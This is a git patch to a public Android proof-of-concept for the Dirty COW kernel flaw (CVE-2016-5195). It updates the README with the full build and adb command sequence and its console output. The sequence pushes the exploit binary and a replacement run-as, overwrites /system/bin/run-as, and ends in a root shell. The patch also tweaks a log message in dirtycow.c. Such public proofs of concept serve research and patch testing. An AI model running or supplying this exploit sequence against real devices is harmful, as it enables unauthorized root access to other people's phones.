From d794acf0a98894c24a73655e2db8ab4573a861ec Mon Sep 17 00:00:00 2001 From: Tim Date: Mon, 19 Dec 2016 22:03:39 +0800 Subject: [PATCH] update Readme.md --- README.md | 61 ++++++++++++++++++++++++++++++++++++------------------ dirtycow.c | 2 +- 2 files changed, 42 insertions(+), 21 deletions(-) diff --git a/README.md b/README.md index 9a9c8f5..9dd9bb8 100644 --- a/README.md +++ b/README.md @@ -1,32 +1,53 @@ # CVE-2016-5195 CVE-2016-5195 (dirty cow/dirtycow/dirtyc0w) proof of concept for Android +This repository demonstrates the vulnerability on vulnerable Android devices attached via ADB. +It does not disable SELinux (see https://github.com/timwr/CVE-2016-5195/issues/9) or install superuser on the device. + ``` + $ make root -ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk -make[1]: Entering directory `./CVE-2016-5195' +ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16 +make[1]: Entering directory '/home/user/dev/git/exploits/CVE-2016-5195' +[arm64-v8a] Install : dirtycow => libs/arm64-v8a/dirtycow +[arm64-v8a] Install : run-as => libs/arm64-v8a/run-as +[x86_64] Install : dirtycow => libs/x86_64/dirtycow +[x86_64] Install : run-as => libs/x86_64/run-as +[mips64] Install : dirtycow => libs/mips64/dirtycow +[mips64] Install : run-as => libs/mips64/run-as +[armeabi-v7a] Install : dirtycow => libs/armeabi-v7a/dirtycow +[armeabi-v7a] Install : run-as => libs/armeabi-v7a/run-as [armeabi] Install : dirtycow => libs/armeabi/dirtycow [armeabi] Install : run-as => libs/armeabi/run-as -make[1]: Leaving directory `./CVE-2016-5195' -adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow -[100%] /data/local/tmp/dirtycow -adb push libs/armeabi/run-as /data/local/tmp/run-as +[x86] Install : dirtycow => libs/x86/dirtycow +[x86] Install : run-as => libs/x86/run-as +[mips] Install : dirtycow => libs/mips/dirtycow +[mips] Install : run-as => libs/mips/run-as +make[1]: Leaving directory '/home/user/dev/git/exploits/CVE-2016-5195' +adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow +[100%] /data/local/tmp/dcow +adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as [100%] /data/local/tmp/run-as -adb shell 'chmod 777 /data/local/tmp/run-as' -adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as' -warning: new file size (9464) and file old size (17944) differ - -size 17944 +adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as' +dcow /data/local/tmp/run-as /system/bin/run-as +warning: new file size (17944) and file old size (5544) differ - -[*] mmap 0xb51e5000 -[*] exploit (patch) -[*] currently 0xb51e5000=464c457f -[*] madvise = 0xb51e5000 17944 -[*] madvise = 0 1048576 -[*] /proc/self/mem 1635778560 1048576 -[*] exploited 0xb51e5000=464c457f +[*] size 5544 +[*] mmap 0xb536b000 +[*] currently 0xb536b000=464c457f +[*] madvise = 0xb536b000 5544 +[*] madvise = 0 0 +[*] /proc/self/mem 5544 1 +[*] exploited 0xb536b000=464c457f adb shell /system/bin/run-as -running as uid 2000 +uid /system/bin/run-as 2000 uid 0 +0 u:r:runas:s0 +context 0 u:r:shell:s0 +/system/bin/sh: can't find tty fd: No such device or address +/system/bin/sh: warning: won't have full job control +shamu:/ # id +uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:shell:s0 +shamu:/ # + ``` diff --git a/dirtycow.c b/dirtycow.c index ad14c39..c09665a 100644 --- a/dirtycow.c +++ b/dirtycow.c @@ -167,7 +167,7 @@ int dcow(int argc, const char * argv[]) size_t size = st2.st_size; if (st2.st_size != st.st_size) { - LOGV("warning: new file size (%lld) and file old size (%lld) differ\n", (unsigned long long)st.st_size, (unsigned long long)st2.st_size); + LOGV("warning: new file size (%lld) and destination file size (%lld) differ\n", (unsigned long long)st2.st_size, (unsigned long long)st.st_size); if (st2.st_size > st.st_size) { LOGV("corruption?\n"); }